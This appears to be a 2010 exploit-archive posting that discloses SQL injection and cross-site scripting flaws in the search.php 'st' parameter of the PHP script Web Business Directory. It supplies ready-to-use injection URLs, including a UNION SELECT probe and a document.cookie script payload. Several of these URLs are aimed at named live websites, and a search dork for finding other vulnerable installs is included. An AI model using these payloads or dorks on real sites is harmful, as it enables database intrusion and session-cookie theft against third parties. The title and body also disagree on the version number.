Web Business Directory 1.1 (search.php) Multiple Remote Vuln

Posted on 12 March 2010
=======================================================================
Web Business Directory 1.1 (search.php) Multiple Remote Vulnerabilities
=======================================================================

[»] Web Business Directory 1.0 (search.php) Multiple Remote
Vulnerabilities
==========

[»] Script: [ Web Business Directory 1.0 ]
[»] Language: [ PHP ]
[»] Download: [ http://www.phpdirectorysource.com/
]
[»] Team: [ EvilWay ]
[»] Dork: [ Copyright 2005-2006
phpDirectorySource, all rights reserved ]
[»] Price: [ $75.00 ]
[»] Site : [ https://security-shell.ws/forum.php
]

###########################################################################


===[ Exploit SQL INJECTION + LIVE : vulnerability ]===

[»] http://www.site.com/patch/search.php?sa=site&sk=a&nl=11&st=

[»]
http://www.phpdirectorysource.com/directory/search.php?sa=site&sk=a&nl=11&s
t=XX' union select version()/*
[»] http://ilovealbertaoil.com/search.php?sa=site&sk=a&nl=11&st=XX'
union select version()/*

===[ Exploit XSS + LIVE : vulnerability ]===

[»] http://www.site.com/patch/search.php?sa=site&sk=a&nl=11&st=

[»]
http://www.phpdirectorysource.com/directory/search.php?sa=site&sk=a&nl=11&s
t="><script>alert(document.cookie);</script>
[»]
http://ilovealbertaoil.com/search.php?sa=site&sk=a&nl=11&st="><script>alert
(document.cookie);</script>


Author: Moudi


# ~  - [ [ : Inj3ct0r : ] ]
TOP
Malware :

None in database
Last 20
Exploits :

Last 20